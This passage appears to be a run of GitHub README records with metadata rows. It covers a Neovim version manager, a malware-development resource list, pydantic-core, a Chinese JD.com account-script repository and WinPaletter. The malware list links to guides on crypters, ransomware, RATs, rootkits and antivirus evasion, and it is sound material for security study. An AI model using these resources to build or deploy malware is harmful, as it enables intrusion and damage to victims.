"installation_location": "/home/user/.local/share/bob/nvim-bin", // The path in which the used neovim version will be located in
"version_sync_file_location": "/home/user/.config/nvim/nvim.version", // The path to a file that will hold the neovim version string, useful for config version tracking, bob will error if the specified file is not a valid file path
"rollback_limit": 3, // The amount of rollbacks before bob starts to delete older ones, can be up to 225
"github_mirror": "https://github.com" // github or github mirror
}
```
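Since the config can also be written in TOML, the same example as `config.toml` might look like the following sketch; this assumes the TOML keys simply mirror the JSON property names shown above:
```toml
# /home/user/.config/bob/config.toml
enable_nightly_info = true
enable_release_build = false
downloads_location = "$HOME/.local/share/bob"
installation_location = "/home/user/.local/share/bob/nvim-bin"
version_sync_file_location = "/home/user/.config/nvim/nvim.version"
rollback_limit = 3
github_mirror = "https://github.com"
```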
## 💻 Shell Completion
- Bash
Completion files are commonly stored in `/etc/bash_completion.d/` for system-wide commands, but can be stored in `~/.local/share/bash-completion/completions` for user-specific commands. Run the command:
```bash
mkdir -p ~/.local/share/bash-completion/completions
bob complete bash >> ~/.local/share/bash-completion/completions/bob
```
This installs the completion script. You may have to log out and log back in to your shell session for the changes to take effect.
- Bash (macOS/Homebrew)
Homebrew stores bash completion files within the Homebrew directory. With the `bash-completion` brew formula installed, run the command:
```bash
mkdir -p $(brew --prefix)/etc/bash_completion.d
bob complete bash > $(brew --prefix)/etc/bash_completion.d/bob.bash-completion
```
- Fish
Fish completion files are commonly stored in `$HOME/.config/fish/completions`. Run the command:
```fish
mkdir -p ~/.config/fish/completions
bob complete fish > ~/.config/fish/completions/bob.fish
```
This installs the completion script. You may have to log out and log back in to your shell session for the changes to take effect.
- Zsh
Zsh completions are commonly stored in any directory listed in your `$fpath` variable. To use these completions, you must either add the generated script to one of those directories, or add your own to this list.
Adding a custom directory is often the safest bet if you are unsure of which directory to use. First create the directory; for this example we'll create a hidden directory inside our `$HOME` directory:
```zsh
mkdir ~/.zfunc
```
Then add the following lines to your `.zshrc` just before `compinit`:
```zsh
fpath+=~/.zfunc
```
Now you can install the completions script using the following command:
```zsh
bob complete zsh > ~/.zfunc/_bob
```
You must then either log out and log back in, or simply run
```zsh
exec zsh
```
for the new completions to take effect.
- PowerShell
The PowerShell completion scripts require PowerShell v5.0+ (which comes with Windows 10, but can be downloaded separately for windows 7 or 8.1).
First, check if a profile has already been set
```powershell
Test-Path $profile
```
If the above command returns `False` run the following
```powershell
New-Item -path $profile -type file -force
```
Now open the file provided by `$profile` (if you used the `New-Item` command it will be `${env:USERPROFILE}\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1`)
Next, we either save the completions file into our profile, or into a separate file and source it inside our profile. To save the completions into our profile simply use
```powershell
bob complete powershell >> ${env:USERPROFILE}\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
```
## 🛠️ Troubleshooting
`sudo: nvim: command not found`
This error can be caused when `secure_path` is enabled in `/etc/sudoers` like in distros such as Fedora Workstation 37, possible workarounds:
1. disable `secure_path`
2. run `sudo env "PATH=$PATH" nvim`
3. set `$SUDO_EDITOR` to the location of the bob nvim binary: `SUDO_EDITOR='/home/user/.local/share/bob/nvim-bin/nvim'`
These workarounds were devised by @nfejzic, thanks to him.
## :heart: Credits And Inspiration
- [nvm](https://github.com/nvm-sh/nvm) A node version manager
- [nvenv](https://github.com/NTBBloodbath/nvenv) A Neovim version manager written by NTBBloodbath
| A version manager for neovim | neovim,neovim-version-manager,version-manager,rust,tool,command-line,hacktoberfest | 31 | 24 | 114 | 667 | 7 | 8 | 2 |
rootkit-io/awesome-malware-development | # Introduction
This Repo serves as a list of resources for malware development.
Note: I am just a learner; I'm sharing the resources I have, and some of them may not be great. You can help me by adding things.
# Essentials
I would say having some experience with C and assembly is going to be good.
Some resources for C and assembly:
- [C for Everyone: Programming Fundamentals](https://www.coursera.org/learn/c-for-everyone)
- [learn-c](https://www.learn-c.org/)
- [C cheatsheet](https://learnxinyminutes.com/docs/c/)
- [Architecture 1001: x86-64 Assembly](https://p.ost2.fyi/courses/course-v1:OpenSecurityTraining2+Arch1001_x86-64_Asm+2021_v1/about)
- [x86 Assembly](https://opensecuritytraining.info/IntroX86.html)
# Blogs
[Vitali Kremez blog](https://www.vkremez.com/)
> Lot's of Malware related content.
[0xPat blog](https://0xpat.github.io/)
> Have an amazing malware development series i would recommend to take a look.
[zerosum0x0 blog](https://zerosum0x0.blogspot.com/)
> Some good posts.
[Guitmz blog](https://www.guitmz.com/)
> Dope Maldev Content.
[TheXcellerator](https://xcellerator.github.io/)
> Amazing LKM rookit series and maldev posts.
---
# Talks
[Horse Pill: A New Type of Linux Rootkit](https://www.youtube.com/watch?v=wyRRbow4-bc)\
[Not a talk but good LKM rootkit series](https://www.youtube.com/playlist?list=PLrdeBRwgL0TrjHL0iHqRJD8Pz9t9FECHy)\
[Good talk on Creating and Countering the Next Generation of Linux Rootkits](https://www.youtube.com/watch?v=g6SKWT7sROQ)\
[Kernel Mode Threats and Practical Defenses](https://www.youtube.com/watch?v=BBJgKuXzfwc)\
[Alex Ionescu - Advancing the State of UEFI Bootkits](https://www.youtube.com/watch?v=dpG97TBR3Ys)\
[BlueHat v18 || Return of the kernel rootkit malware (on windows 10)](https://youtu.be/qVIxFfXpyNc)
---
# Youtube channels
[AGDC Services](https://m.youtube.com/channel/UCnpn999NpDMMPxZXW8sgZLA)
> HQ Malware Content.
[TheSphinx](https://www.youtube.com/c/TheSphinx/)
> Have an amazing series on Writing your Rat from Scratch.
[Joey Abrams](https://www.youtube.com/channel/UCIjKM-9G9r2Og2E080Wfbvw)
> Amazing Malware stuff, have a good code injection series, Linux stuff.
[w3w3w3](https://www.youtube.com/c/w3w3w3)
> Have a good LKM rootkit series.
# Courses
There are some courses I would love to recommend.
[RED TEAM Operator: Malware Development Essentials course | Sektor7](https://www.sektor7.net/institute/RTO-MalDev)
>This course will teach you how to become a better ethical hacker, pentester and red teamer by learning malware development. It covers developing droppers, trojans and payload/DLL injectors using some basic C and Intel assembly skills.
[RED TEAM Operator: Malware Development Intermediate course](https://www.sektor7.net/institute/RTO-MalDev2)
> Advanced malware development techniques in Windows, including: API hooking, 32-/64-bit migrations, reflective binaries and more.
[RingZerø: Windows Kernel Rootkits: Techniques and Analysis](https://ringzer0.training/2019/windows-kernel-rootkits.html)
> Key Learnings:
- Machine architecture for kernel programmers
- Virtual memory management
- Interrupts and exceptions
- CPU security features
- Windows kernel architecture
- Kernel components (Ps, Io, Mm, Ob, Se, Cm, etc.)
- System mechanisms
- Debugging with WinDbg
- Rootkit techniques
- Driver development
[CodeMachine: Windows Kernel Rootkits](https://www.codemachine.com/trainings/kerrkt.html)
> Topics:
- Kernel Attacks
- Kernel Shellcoding
- Kernel Hooking and Injection
- Kernel Callbacks
- Kernel Filtering
- Kernel Networking
- Virtualization Based Security
---
# Books
- The Art of Computer Virus Research and Defense
- The Giant Black Book of Computer Viruses
- Designing BSD Rootkits: An Introduction to Kernel Hacking
- Rootkits and Bootkits
- The Antivirus Hackers' Handbook
## Free books
[Make your own first fud crypter](https://www.docdroid.net/GrvkCtu/make-your-fud-crypter-pdf)
---
# Articles/posts
[Malware Development – Welcome to the Dark Side: Part 1](https://niiconsulting.com/checkmate/2018/02/malware-development-welcome-dark-side-part-1/)\
[Art of Malware](https://danusminimus.github.io/2020/03/04/The-Art-of-Malware.html)\
[Malware Development Part 1](https://0xpat.github.io/Malware_development_part_1/)\
[Basic Ransomware guide](https://0x00sec.org/t/basic-ransomware-guide/28345)\
[Understanding TRITON and the Missing Final Stage of the Attack good read.](https://threatpost.com/understanding-triton-and-the-missing-final-stage-of-the-attack/134895/)\
[Master of RATs - How to create your own Tracker](https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848)\
[Amazing article to read with some good resources (Personal Tale and the Road to Malware Development, Resources)](https://0x00sec.org/t/personal-tale-and-the-road-to-malware-development-resources/20369)\
[PT_NOTE -> PT_LOAD x64 ELF virus written in Assembly](https://www.guitmz.com/linux-midrashim-elf-virus/)\
[The magic of LD_PRELOAD for Userland Rootkits (a good read if you want to get into userland rootkits)](https://fluxius.handgrep.se/2011/10/31/the-magic-of-ld_preload-for-userland-rootkits/)\
[(Recommended read) If you want to create your first userland rootkit and you only know C, this blog is a good place to start with rootkit development](https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/#)\
[Function Hooking Part I: Hooking Shared Library Function Calls in Linux](https://www.netspi.com/blog/technical/network-penetration-testing/function-hooking-part-i-hooking-shared-library-function-calls-in-linux/)\
[Inline Hooking for Programmers (Part 1: Introduction)](https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-1.html)\
[Inline Hooking for Programmers (Part 2: Writing a Hooking Engine)](https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-2.html)\
[PE injection for beginners](https://www.malwaretech.com/2013/11/portable-executable-injection-for.html)\
[Becoming-rat-your-system](https://devilinside.me/blogs/becoming-rat-your-system)\
[Complete guide on LKM hacking](http://www.ouah.org/LKM_HACKING.html)\
[Recommended series if you want to get into programming/malware dev: it starts with the programming and assembly basics you need, then moves on to maldev](https://0x00sec.org/t/programming-for-wannabes-part-i/1143)\
[Fileless malware](https://0x00sec.org/t/fileless-malware/26973)\
[Examining the Morris Worm Source Code](https://0x00sec.org/t/examining-the-morris-worm-source-code-malware-series-0x02/685)\
[IOT Malware](https://0x00sec.org/t/iot-malware-droppers-mirai-and-hajime/1966)\
[DoublePulsar SMB backdoor analysis](https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html)\
[Eset Turla Outlook backdoor report](https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf)\
[Writing a custom encoder](https://smarinovic.github.io/posts/Custom-Encoder/)\
[Engineering antivirus evasion](https://blog.scrt.ch/2020/06/19/engineering-antivirus-evasion/)\
[Analysis of Project Sauron APT](https://securelist.com/faq-the-projectsauron-apt/75533/)\
[WastedLocker analysis](https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/)\
[Lazarus shellcode execution](https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method)\
[Detailed analysis of Zloader](https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf)\
[BendyBear shellcode malware](https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/)\
[A Basic Windows DKOM Rootkit](https://blog.landhb.dev/posts/v9eRa/a-basic-windows-dkom-rootkit-pt-1/)\
[Loading Kernel Shellcode](https://www.fireeye.com/blog/threat-research/2018/04/loading-kernel-shellcode.html)\
[Windows Kernel Shellcode on Windows 10 – Part 1](https://improsec.com/tech-blog/windows-kernel-shellcode-on-windows-10-part-1)\
[Windows Kernel Shellcode on Windows 10 – Part 2](https://improsec.com/tech-blog/windows-kernel-shellcode-on-windows-10-part-2)\
[Windows Kernel Shellcode on Windows 10 – Part 3](https://improsec.com/tech-blog/windows-kernel-shellcode-on-windows-10-part-3)\
[Introduction to Shellcode Development](https://owasp.org/www-pdf-archive/Introduction_to_shellcode_development.pdf)\
[Autochk Rootkit Analysis](https://repnz.github.io/posts/autochk-rootkit-analysis/)\
[pierogi backdoor](https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-2-the-discovery-of-the-new-mysterious-pierogi-backdoor?utm_content=116986912&utm_medium=social&utm_source=twitter&hss_channel=tw-835463838)\
[Pay2Kitten](https://samples.vx-underground.org/APTs/2020/2020.12.17(1)/Paper/Pay2Kitten.pdf)\
[STEELCORGI](https://samples.vx-underground.org/APTs/2021/2021.01.12(2)/Paper/STEEL%20CORGI.pdf)\
[Lebanese Cedar APT](https://samples.vx-underground.org/APTs/2021/2021.01.28/Paper/Lebanese%20Cedar%20APT.pdf)\
[LazyScripter](https://samples.vx-underground.org/APTs/2021/2021.02.24(1)/Paper/LazyScripter.pdf)\
[Maze deobfuscation](https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/)\
[Darkside overview](https://unit42.paloaltonetworks.com/darkside-ransomware/)\
[SunBurst backdoor - FireEye analysis](https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html)\
[Code obfuscation techniques](https://chris124567.github.io/2021-06-23-survey-obfuscation/)\
[SideCopy APT tooling](https://talosintelligence.com/resources/257)\
[Hiding in PEB sight: Custom loader](https://blog.christophetd.fr/hiding-windows-api-imports-with-a-customer-loader/)\
[Zloader: New infection technique](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/)\
[FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines](https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/)\
[A tale of EDR bypass methods](https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/)\
[In-depth dive into the security features of the Intel/Windows platform secure boot process](https://igor-blue.github.io/2021/02/04/secure-boot.html)\
[Process Injection Techniques](https://www.cynet.com/attack-techniques-hands-on/process-injection-techniques/)\
[Adventures with KernelCallbackTable Injection](https://captmeelo.com/redteam/maldev/2022/04/21/kernelcallbacktable-injection.html)\
[Useful Libraries for Malware Development](https://captmeelo.com//redteam/maldev/2022/02/16/libraries-for-maldev.html)\
[Parent Process ID (PPID) Spoofing](https://captmeelo.com/redteam/maldev/2021/11/22/picky-ppid-spoofing.html)\
[Mutants Sessions Self Deletion](https://github.com/Octoberfest7/Mutants_Sessions_Self-Deletion)\
[OffensiVe Security with V - Process Hollowing](https://alexfrancow.github.io/app-development/OffensiVe-Security-with-V-Hollowing/)\
[Looking for Remote Code Execution bugs in the Linux kernel](https://xairy.io/articles/syzkaller-external-network)\
[memory-analysis-evasion](https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html)\
[100% evasion - Write a crypter in any language to bypass AV](https://netsec.expert/posts/write-a-crypter-in-any-language/)
---
# Forums
- https://0x00sec.org/
> One of the best malware development forums; it helped me a lot.
---
# Sample Sharing
- [Underground](https://vx-underground.org/samples.html)
- [MalShare](https://www.malshare.com/)
- [Malware Bazaar](https://bazaar.abuse.ch/browse/)
---
# Some interesting GitHub repos (miscellaneous)
[TL-TROJAN](https://github.com/threatland/TL-TROJAN)
> A collection of source code for various RATs, Stealers, and other Trojans.
[Linker_preloading_virus](https://github.com/elfmaster/linker_preloading_virus)
> An example of hijacking the dynamic linker with a custom interpreter that loads and executes modular viruses.
[Awesome-linux-rootkits](https://github.com/tkmru/awesome-linux-rootkits)
> A summary of Linux rootkits published on GitHub.
[Virii](https://github.com/guitmz/virii)
> Collection of ancient computer virus source codes.
[Flare-floss](https://github.com/mandiant/flare-floss)
> FLARE Obfuscated String Solver - Automatically extract obfuscated strings from malware.
[Ebpfkit](https://github.com/Gui774ume/ebpfkit)
> Ebpfkit is a rootkit powered by eBPF.
[Al-Khaser](https://github.com/LordNoteworthy/al-khaser#al-khaser-v081)
> Public malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection.
[Evasions](https://github.com/CheckPointSW/Evasions)
> The Evasions encyclopedia gathers methods used by malware to evade detection when run in a virtualized environment.
[loonix_syscall_hook](https://github.com/null0333/loonix_syscall_hook)
> System call hooking on arm64 linux via a variety of methods.
[awesome-executable-packing](https://github.com/dhondta/awesome-executable-packing)
> A curated list of awesome resources related to executable packing.
| Organized list of my malware development resources | malware,malware-development,malware-research | 0 | 1 | 0 | 20 | 2 | 1 | 0 |
pydantic/pydantic-core | # pydantic-core
[![CI](https://github.com/pydantic/pydantic-core/workflows/ci/badge.svg?event=push)](https://github.com/pydantic/pydantic-core/actions?query=event%3Apush+branch%3Amain+workflow%3Aci)
[![Coverage](https://codecov.io/gh/pydantic/pydantic-core/branch/main/graph/badge.svg)](https://codecov.io/gh/pydantic/pydantic-core)
[![pypi](https://img.shields.io/pypi/v/pydantic-core.svg)](https://pypi.python.org/pypi/pydantic-core)
[![versions](https://img.shields.io/pypi/pyversions/pydantic-core.svg)](https://github.com/pydantic/pydantic-core)
[![license](https://img.shields.io/github/license/pydantic/pydantic-core.svg)](https://github.com/pydantic/pydantic-core/blob/main/LICENSE)
This package provides the core functionality for [pydantic](https://docs.pydantic.dev) validation and serialization.
Pydantic-core is currently around 17x faster than pydantic V1.
See [`tests/benchmarks/`](./tests/benchmarks/) for details.
## Example of direct usage
_NOTE: You should not need to use pydantic-core directly; instead, use pydantic, which in turn uses pydantic-core._
```py
from pydantic_core import SchemaValidator, ValidationError
v = SchemaValidator(
{
'type': 'typed-dict',
'fields': {
'name': {
'type': 'typed-dict-field',
'schema': {
'type': 'str',
},
},
'age': {
'type': 'typed-dict-field',
'schema': {
'type': 'int',
'ge': 18,
},
},
'is_developer': {
'type': 'typed-dict-field',
'schema': {
'type': 'default',
'schema': {'type': 'bool'},
'default': True,
},
},
},
}
)
r1 = v.validate_python({'name': 'Samuel', 'age': 35})
assert r1 == {'name': 'Samuel', 'age': 35, 'is_developer': True}
# pydantic-core can also validate JSON directly
r2 = v.validate_json('{"name": "Samuel", "age": 35}')
assert r1 == r2
try:
v.validate_python({'name': 'Samuel', 'age': 11})
except ValidationError as e:
print(e)
"""
1 validation error for model
age
Input should be greater than or equal to 18
[type=greater_than_equal, context={ge: 18}, input_value=11, input_type=int]
"""
```
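The same core schema format drives serialization via `SchemaSerializer`. The snippet below is a minimal illustrative sketch, not taken from this README; check [`python/pydantic_core/core_schema.py`](./python/pydantic_core/core_schema.py) for the exact schema keys.

```py
from pydantic_core import SchemaSerializer

# Minimal sketch (assumption: SchemaSerializer accepts the same core schema dicts
# as SchemaValidator above; verify the keys against core_schema.py).
s = SchemaSerializer({'type': 'int'})

assert s.to_python(42) == 42
assert s.to_json(42) == b'42'  # JSON output is returned as bytes
```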
## Getting Started
You'll need rust stable [installed](https://rustup.rs/), or rust nightly if you want to generate accurate coverage.
With rust and python 3.8+ installed, compiling pydantic-core should be possible with roughly the following:
```bash
# clone this repo or your fork
git clone git@github.com:pydantic/pydantic-core.git
cd pydantic-core
# create a new virtual env
python3 -m venv env
source env/bin/activate
# install dependencies and install pydantic-core
make install
```
That should be it; the example shown above should now run.
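As a quick sanity check after `make install` (a hedged suggestion, not an official Makefile step), you can confirm the compiled extension imports and validates correctly:

```py
import pydantic_core
from pydantic_core import SchemaValidator

# If the build and install succeeded, this prints the installed version
# and a trivial validation passes.
print(pydantic_core.__version__)
assert SchemaValidator({'type': 'int'}).validate_python(123) == 123
```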
You might find it useful to look at [`python/pydantic_core/_pydantic_core.pyi`](./python/pydantic_core/_pydantic_core.pyi) and
[`python/pydantic_core/core_schema.py`](./python/pydantic_core/core_schema.py) for more information on the python API,
beyond that, [`tests/`](./tests) provide a large number of examples of usage.
If you want to contribute to pydantic-core, you'll want to use some other make commands:
* `make build-dev` to build the package during development
* `make build-prod` to perform an optimised build for benchmarking
* `make test` to run the tests
* `make testcov` to run the tests and generate a coverage report
* `make lint` to run the linter
* `make format` to format python and rust code
* `make` to run `format build-dev lint test`
## Profiling
It's possible to profile the code using the [`flamegraph` utility from `flamegraph-rs`](https://github.com/flamegraph-rs/flamegraph). (Tested on Linux.) You can install this with `cargo install flamegraph`.
Run `make build-profiling` to install a release build with debugging symbols included (needed for profiling).
Once that is built, you can profile pytest benchmarks with (e.g.):
```bash
flamegraph -- pytest tests/benchmarks/test_micro_benchmarks.py -k test_list_of_ints_core_py --benchmark-enable
```
The `flamegraph` command will produce an interactive SVG at `flamegraph.svg`.
## Releasing
1. Bump package version locally. Do not just edit `Cargo.toml` on GitHub; you need both `Cargo.toml` and `Cargo.lock` to be updated.
2. Make a PR for the version bump and merge it.
3. Go to https://github.com/pydantic/pydantic-core/releases and click "Draft a new release"
4. In the "Choose a tag" dropdown enter the new tag `v<the.new.version>` and select "Create new tag on publish" when the option appears.
5. Enter the release title in the form "v<the.new.version> <YYYY-MM-DD>"
6. Click Generate release notes button
7. Click Publish release
8. Go to https://github.com/pydantic/pydantic-core/actions and ensure that all release builds have completed successfully.
9. Go to https://pypi.org/project/pydantic-core/ and ensure that the latest release is published.
10. Done 🎉
| Core validation logic for pydantic written in rust | json-schema,parsing,pydantic,rust,schema,validation | 105 | 77 | 1,066 | 1,126 | 63 | 104 | 2 |
shufflewzc/faker3 | ## Repository description
### Never return until Loulan falls
Faker's personal repository. Keys are computed locally to keep account information safe. Adapted for 24/7 monitoring with the Spy plugin.
* Recommended for use together with Spy
* Comes with its own repository-pull proxy
* Updated daily
### Note
Qinglong versions now iterate quickly while Qinglong plugin adaptation lags behind. To use this repository without issues, please install Qinglong 2.11.3 with the one-click installation script.
[One-click script]
https://thin-hill-428.notion.site/Faker-QL-pannel-Faker-Repository-environment-Setup-45edcbfe90d74d8abb2d71896eab3be7
## Clean edition
No bundled referral codes of any kind.
#### [Click through to the channel for more usage tutorials](https://t.me/scriptalking)
[![Anurag's GitHub stats](https://github-readme-stats.vercel.app/api?username=shufflewzc&bg_color=30,e96443,904e95&title_color=fff&text_color=fff)](https://github.com/anuraghazra/github-readme-stats)
[Note] Before pulling the repository, open the Qinglong panel - Config file, line 18, and remove the content inside the double quotes of GithubProxyUrl="".
Faker3 clean edition
ql repo https://git.metauniverse-cn.com/https://github.com/shufflewzc/faker3.git "jd_|jx_|gua_|jddj_|jdCookie" "activity|backUp" "^jd[^_]|USER|function|utils|sendNotify|ZooFaker_Necklace.js|JDJRValidator_|sign_graphics_validate|ql|JDSignValidator|magic|depend|h5sts" "main"
[Tutorial collection]
[https://www.notion.so/Cent-OS-7-6-1c598629675145988b43a37998a1604a]()
## Special statement:
* Any unlocking or decryption analysis scripts involved in the Script project released by this repository are for testing, learning and research only, and may not be used for commercial purposes. Their legality, accuracy, completeness and effectiveness cannot be guaranteed; please use your own judgment.
* No official account or self-media outlet may reproduce or publish any resource file of this project in any form.
* This repository is not responsible for any script problems, including but not limited to any loss or damage caused by any script error.
* This repository is not responsible for any privacy leakage or other consequences arising from indirect use of the scripts, including but not limited to setting up a VPS or distributing them, where such actions violate national or regional laws or related regulations.
* Do not use any content of the Script project for commercial or illegal purposes; otherwise you bear the consequences yourself.
* If any organization or individual believes a script in this project may infringe their rights, they should notify us promptly and provide proof of identity and ownership; we will delete the relevant script after receiving the documentation.
* Anyone who views this project in any way, or directly or indirectly uses any script of the Script project, should read this statement carefully. This repository reserves the right to change or supplement this disclaimer at any time. Once you use or copy any script or rule of the Script project, you are deemed to have accepted this disclaimer.
**You must completely delete the above content from your computer or mobile phone within 24 hours of downloading.** <br>
> ***By using or copying any script from this repository you are deemed to have accepted this statement; please read it carefully.***
## Special thanks to:
* [@NobyDa](https://github.com/NobyDa)
* [@chavyleung](https://github.com/chavyleung)
* [@liuxiaoyucc](https://github.com/liuxiaoyucc)
* [@Zero-S1](https://github.com/Zero-S1)
* [@uniqueque](https://github.com/uniqueque)
* [@nzw9314](https://github.com/nzw9314)
* [@Andy Woo](https://t.me/update_help_group) (support from the Qinglong mutual-aid research group)
* [@Oreo](https://github.com/Oreomeow) (one-click installation and configuration for the Qinglong Faker repository)
# Pull Requests welcome!
| null | null | 0 | 3 | 16 | 510 | 2 | 1 | 0 |
Abdelrhman-AK/WinPaletter | ## 🛑 Announcement: Project Development Discontinuation:
Dear WinPaletter Users,
It is with a heavy heart that I announce the discontinuation of further development on the WinPaletter project. While there's an extremely slim possibility that I may find time in the distant future, perhaps years from now, to resume maintenance, I must inform you that version `1.0.9.3` marks the end of active development. Subsequent versions (`1.0.9.x`) are very unlikely to be developed.
In the coming days or weeks, I will proceed to archive this repository. However, please note that the existing version will remain accessible for continued use, albeit without updates or maintenance.
You can certainly contribute to the WinPaletter Store for themes; this repository won't be archived. [Open the Wiki](https://github.com/Abdelrhman-AK/WinPaletter/wiki) and navigate to the WinPaletter Store section in the side panel.
I want to express my deepest gratitude for your support and for choosing WinPaletter. Your enthusiasm and feedback have been invaluable throughout this journey. It has been an immense honor for me to contribute to a project that aimed to enhance your user experience. If WinPaletter has caused any inconvenience or disruption to your Windows setup, I sincerely apologize.
---
# WinPaletter
# ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/GithubBannerIntro.jpg?raw=true)
![Github All Releases](https://img.shields.io/github/downloads/Abdelrhman-AK/WinPaletter/total?color=0078D4&style=for-the-badge) ![GitHub Release](https://img.shields.io/github/v/release/Abdelrhman-AK/WinPaletter?color=05227A&style=for-the-badge) [![GitHub stars](https://img.shields.io/github/stars/Abdelrhman-AK/WinPaletter?color=F4870A&style=for-the-badge)](https://github.com/Abdelrhman-AK/WinPaletter/stargazers) [![GitHub issues](https://img.shields.io/github/issues/Abdelrhman-AK/WinPaletter?color=FF0000&style=for-the-badge)](https://github.com/Abdelrhman-AK/WinPaletter/issues) [![GitHub forks](https://img.shields.io/github/forks/Abdelrhman-AK/WinPaletter?color=00AF00&style=for-the-badge)](https://github.com/Abdelrhman-AK/WinPaletter/network) [![GitHub license](https://img.shields.io/github/license/Abdelrhman-AK/WinPaletter?color=FF0C4F&style=for-the-badge)](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/License.md)
#### WinPaletter is a portable tool designed to elevate your Windows desktop experience. Whether you're a designer, developer, or someone who loves personalization, WinPaletter offers an intuitive interface and robust features to streamline the management and application of colors and effects on your Windows system.
#### With WinPaletter, you can customize a wide range of Windows aspects, including Windows Colors, Visual Styles, Classic Colors, Lock screen (LogonUI), Cursors, Metrics and Fonts, Terminals and Consoles, wallpaper, sounds, screen savers, Windows effects (tweaks), and Windows icons according to your preferences.
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Features.png?raw=true) Key Features
- **Intuitive Interface:** WinPaletter boasts a user-friendly interface, making color palette management accessible to users of all levels of expertise.
- **Themes Import/Export:** Explore a world of creativity with the ability to import and export themes. Visit the WinPaletter Store to discover a diverse collection of themes shared by the community.
- **Real-time Preview:** Witness your color choices come to life with the real-time preview feature, allowing you to fine-tune your color scheme effortlessly.
![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Preview.png?raw=true)
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/GettingStarted.png?raw=true) Getting Started
1. **Requirements:**
| Windows | WinPaletter ... and higher | Frameworks |
| ------------------ | ------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **11, 10** | `Any version` | You might need to [update .NET framework](https://dotnet.microsoft.com/en-us/download/dotnet-framework/net48) in outdated Windows 10 or build less than 1709 |
| **8.1, 7** | `1.0.5.0` | [.NET Framework 4.7.2, or 4.8](https://dotnet.microsoft.com/en-us/download/dotnet-framework/net48) |
| **8** | `Not supported` :x: | Not supported as .NET framework 4.7.2 or 4.8 can't be installed at all |
| **Vista** | `1.0.7.1` | .NET Framework 4.8 Repacked. Read [Windows Vista's documentation](https://github.com/Abdelrhman-AK/WinPaletter/wiki/Getting-Windows-XP-and-Vista-ready-to-make-them-can-launch-WinPaletter#2-windows-vista) |
| **XP** | `1.0.7.1` | OneCoreAPI + .NET Framework 4.8 Repacked. You must read its [documentation](https://github.com/Abdelrhman-AK/WinPaletter/wiki/Getting-Windows-XP-and-Vista-ready-to-make-them-can-launch-WinPaletter) |
2. **Download:**
- You can download the latest release from the [releases page](https://github.com/Abdelrhman-AK/WinPaletter/releases).
> **Note:** It is the first source to be updated.
- Alternatively, you can use:
- Microsoft WinGet:
`winget install Abdelrhman-AK.WinPaletter -l "UnzipPath"`
- Chocolatey:
`choco install WinPaletter` or `choco install WinPaletter --version x.x.xx`
- [Visit this](https://github.com/Abdelrhman-AK/WinPaletter/wiki/Get-WinPaletter) for advanced instructions.
3. **Launch:** Once downloaded, launch WinPaletter and start exploring its features to enhance your desktop aesthetics.
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Help.png?raw=true) Wiki (Help)
[Click here](https://github.com/Abdelrhman-AK/WinPaletter/wiki) to learn more about WinPaletter.
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Help.png?raw=true) Changelog
[Click here](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/CHANGELOG.md) to view all changes that have been made to WinPaletter since its initial release.
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/PayPal.png?raw=true) Support me
[PayPal](https://www.paypal.me/AbdelrhmanAK)
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Languages.png?raw=true) Languages
[Click here](https://github.com/Abdelrhman-AK/WinPaletter/tree/master/Languages) to get languages for WinPaletter.
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Antivirus.png?raw=true) Do you have an antivirus or browser issue?
[Click here to read instructions](https://github.com/Abdelrhman-AK/WinPaletter/wiki/Antiviruses-or-browsers-download-issue).
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Credits.png?raw=true) Credits
WinPaletter is developed and maintained by [Abdelrhman-AK](https://github.com/Abdelrhman-AK) and the incredible open-source community:
- Modifying Modern Windows Elements Inspired by u/aveyo and u/Egg-Tricky on Reddit: [Link 1](https://www.reddit.com/r/Windows11/comments/sw15u0/dark_theme_did_you_notice_the_ugly_pale_accent), [Link 2](https://www.reddit.com/r/Windows11/comments/tkvet4/pitch_black_themereg_now_for_ctrlaltdel_as_well)
- [Patching UxTheme.dll to apply unsigned Visual Styles by SecureUxTheme, developed by namazso](https://github.com/namazso/SecureUxTheme)
